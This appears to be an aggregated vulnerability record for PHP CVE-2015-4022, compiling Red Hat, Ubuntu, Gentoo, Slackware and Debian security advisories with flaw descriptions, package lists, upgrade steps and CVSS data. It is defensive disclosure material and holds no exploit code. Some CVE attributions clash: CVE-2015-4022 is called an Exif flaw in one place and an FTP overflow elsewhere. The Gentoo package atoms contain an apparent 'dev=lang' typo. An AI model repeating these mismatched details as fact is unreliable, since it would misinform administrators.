A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2014-9652, CVE-2015-4604, CVE-2015-4605)
A heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)
A buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)
This update also fixes the following bugs:
-
The libgmp library in some cases terminated unexpectedly with a segmentation fault when being used with other libraries that use the GMP memory management. With this update, PHP no longer changes libgmp memory allocators, which prevents the described crash from occurring. (BZ#1212305)
-
When using the Open Database Connectivity (ODBC) API, the PHP process in some cases terminated unexpectedly with a segmentation fault. The underlying code has been adjusted to prevent this crash. (BZ#1212299)
-
Previously, running PHP on a big-endian system sometimes led to memory corruption in the fileinfo module. This update adjusts the behavior of the PHP pointer so that it can be freed without causing memory corruption. (BZ#1212298)
All php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize() 1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142) 1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c 1188599 - CVE-2014-9652 file: out of bounds read in mconvert() 1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c 1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone 1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict() 1194747 - CVE-2015-2301 php: use after free in phar_object.c 1204868 - CVE-2015-4147 php: SoapClient's __call() type confusion through unserialize() 1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re 1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name 1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1226916 - CVE-2015-4148 php: SoapClient's do_soap_call() type confusion after unserialize() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
ppc64: php-5.4.16-36.el7_1.ppc64.rpm php-cli-5.4.16-36.el7_1.ppc64.rpm php-common-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-gd-5.4.16-36.el7_1.ppc64.rpm php-ldap-5.4.16-36.el7_1.ppc64.rpm php-mysql-5.4.16-36.el7_1.ppc64.rpm php-odbc-5.4.16-36.el7_1.ppc64.rpm php-pdo-5.4.16-36.el7_1.ppc64.rpm php-pgsql-5.4.16-36.el7_1.ppc64.rpm php-process-5.4.16-36.el7_1.ppc64.rpm php-recode-5.4.16-36.el7_1.ppc64.rpm php-soap-5.4.16-36.el7_1.ppc64.rpm php-xml-5.4.16-36.el7_1.ppc64.rpm php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm
s390x: php-5.4.16-36.el7_1.s390x.rpm php-cli-5.4.16-36.el7_1.s390x.rpm php-common-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-gd-5.4.16-36.el7_1.s390x.rpm php-ldap-5.4.16-36.el7_1.s390x.rpm php-mysql-5.4.16-36.el7_1.s390x.rpm php-odbc-5.4.16-36.el7_1.s390x.rpm php-pdo-5.4.16-36.el7_1.s390x.rpm php-pgsql-5.4.16-36.el7_1.s390x.rpm php-process-5.4.16-36.el7_1.s390x.rpm php-recode-5.4.16-36.el7_1.s390x.rpm php-soap-5.4.16-36.el7_1.s390x.rpm php-xml-5.4.16-36.el7_1.s390x.rpm php-xmlrpc-5.4.16-36.el7_1.s390x.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.ael7b_1.src.rpm
ppc64le: php-5.4.16-36.ael7b_1.ppc64le.rpm php-cli-5.4.16-36.ael7b_1.ppc64le.rpm php-common-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-gd-5.4.16-36.ael7b_1.ppc64le.rpm php-ldap-5.4.16-36.ael7b_1.ppc64le.rpm php-mysql-5.4.16-36.ael7b_1.ppc64le.rpm php-odbc-5.4.16-36.ael7b_1.ppc64le.rpm php-pdo-5.4.16-36.ael7b_1.ppc64le.rpm php-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm php-process-5.4.16-36.ael7b_1.ppc64le.rpm php-recode-5.4.16-36.ael7b_1.ppc64le.rpm php-soap-5.4.16-36.ael7b_1.ppc64le.rpm php-xml-5.4.16-36.ael7b_1.ppc64le.rpm php-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: php-bcmath-5.4.16-36.el7_1.ppc64.rpm php-dba-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-devel-5.4.16-36.el7_1.ppc64.rpm php-embedded-5.4.16-36.el7_1.ppc64.rpm php-enchant-5.4.16-36.el7_1.ppc64.rpm php-fpm-5.4.16-36.el7_1.ppc64.rpm php-intl-5.4.16-36.el7_1.ppc64.rpm php-mbstring-5.4.16-36.el7_1.ppc64.rpm php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm php-pspell-5.4.16-36.el7_1.ppc64.rpm php-snmp-5.4.16-36.el7_1.ppc64.rpm
s390x: php-bcmath-5.4.16-36.el7_1.s390x.rpm php-dba-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-devel-5.4.16-36.el7_1.s390x.rpm php-embedded-5.4.16-36.el7_1.s390x.rpm php-enchant-5.4.16-36.el7_1.s390x.rpm php-fpm-5.4.16-36.el7_1.s390x.rpm php-intl-5.4.16-36.el7_1.s390x.rpm php-mbstring-5.4.16-36.el7_1.s390x.rpm php-mysqlnd-5.4.16-36.el7_1.s390x.rpm php-pspell-5.4.16-36.el7_1.s390x.rpm php-snmp-5.4.16-36.el7_1.s390x.rpm
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: php-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm php-dba-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-devel-5.4.16-36.ael7b_1.ppc64le.rpm php-embedded-5.4.16-36.ael7b_1.ppc64le.rpm php-enchant-5.4.16-36.ael7b_1.ppc64le.rpm php-fpm-5.4.16-36.ael7b_1.ppc64le.rpm php-intl-5.4.16-36.ael7b_1.ppc64le.rpm php-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm php-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm php-pspell-5.4.16-36.ael7b_1.ppc64le.rpm php-snmp-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8142 https://access.redhat.com/security/cve/CVE-2014-9652 https://access.redhat.com/security/cve/CVE-2014-9705 https://access.redhat.com/security/cve/CVE-2014-9709 https://access.redhat.com/security/cve/CVE-2015-0231 https://access.redhat.com/security/cve/CVE-2015-0232 https://access.redhat.com/security/cve/CVE-2015-0273 https://access.redhat.com/security/cve/CVE-2015-2301 https://access.redhat.com/security/cve/CVE-2015-2348 https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-2787 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4147 https://access.redhat.com/security/cve/CVE-2015-4148 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4599 https://access.redhat.com/security/cve/CVE-2015-4600 https://access.redhat.com/security/cve/CVE-2015-4601 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2658-1 July 06, 2015
php5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description: - php5: HTML-embedded scripting language interpreter
Details:
Neal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL bytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)
Emmanuel Law discovered that the PHP phar extension incorrectly handled filenames starting with a NULL byte. (CVE-2015-4022, CVE-2015-4643)
Shusheng Liu discovered that PHP incorrectly handled certain malformed form data. (CVE-2015-4024)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated data types. (CVE-2015-4147)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated that the uri property is a string. A remote attacker could possibly use these issues to obtain sensitive information or cause a denial of service. This issue only affected Ubuntu 15.04. (CVE-2015-4644)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2 php5-cgi 5.6.4+dfsg-4ubuntu6.2 php5-cli 5.6.4+dfsg-4ubuntu6.2 php5-fpm 5.6.4+dfsg-4ubuntu6.2
Ubuntu 14.10: libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6 php5-cgi 5.5.12+dfsg-2ubuntu4.6 php5-cli 5.5.12+dfsg-2ubuntu4.6 php5-fpm 5.5.12+dfsg-2ubuntu4.6
Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11 php5-cgi 5.5.9+dfsg-1ubuntu4.11 php5-cli 5.5.9+dfsg-1ubuntu4.11 php5-fpm 5.5.9+dfsg-1ubuntu4.11
Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.19 php5-cgi 5.3.10-1ubuntu3.19 php5-cli 5.3.10-1ubuntu3.19 php5-fpm 5.3.10-1ubuntu3.19
In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201606-10
https://security.gentoo.org/
Severity: Normal Title: PHP: Multiple vulnerabilities Date: June 19, 2016 Bugs: #537586, #541098, #544186, #544330, #546872, #549538, #552408, #555576, #555830, #556952, #559612, #562882, #571254, #573892, #577376 ID: 201606-10
Synopsis
Multiple vulnerabilities have been found in PHP, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Background
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
[ 1 ] CVE-2013-6501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501 [ 2 ] CVE-2014-9705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705 [ 3 ] CVE-2014-9709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709 [ 4 ] CVE-2015-0231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231 [ 5 ] CVE-2015-0273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273 [ 6 ] CVE-2015-1351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351 [ 7 ] CVE-2015-1352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352 [ 8 ] CVE-2015-2301 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301 [ 9 ] CVE-2015-2348 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348 [ 10 ] CVE-2015-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783 [ 11 ] CVE-2015-2787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787 [ 12 ] CVE-2015-3329 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329 [ 13 ] CVE-2015-3330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330 [ 14 ] CVE-2015-4021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021 [ 15 ] CVE-2015-4022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022 [ 16 ] CVE-2015-4025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025 [ 17 ] CVE-2015-4026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026 [ 18 ] CVE-2015-4147 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147 [ 19 ] CVE-2015-4148 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148 [ 20 ] CVE-2015-4642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642 [ 21 ] CVE-2015-4643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643 [ 22 ] CVE-2015-4644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644 [ 23 ] CVE-2015-6831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831 [ 24 ] CVE-2015-6832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832 [ 25 ] CVE-2015-6833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833 [ 26 ] CVE-2015-6834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834 [ 27 ] CVE-2015-6835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835 [ 28 ] CVE-2015-6836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836 [ 29 ] CVE-2015-6837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837 [ 30 ] CVE-2015-6838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838 [ 31 ] CVE-2015-7803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803 [ 32 ] CVE-2015-7804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz
Slackware 14.1 package: 52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz
Slackware -current package: e1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz
Slackware x86_64 -current package: ae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg php-5.4.41-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-4024
Denial of service when processing multipart/form-data requests.
For the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.
We recommend that you upgrade your php5 packages
Show details on source website{
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"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-4022",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201506-130",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-81983",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-4022",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-81983"
},
{
"db": "VULMON",
"id": "CVE-2015-4022"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-130"
},
{
"db": "NVD",
"id": "CVE-2015-4022"
}
]
},
"description": {
"_id": null,
"data": "Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow. PHP is prone to an integer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE-----\nHash: 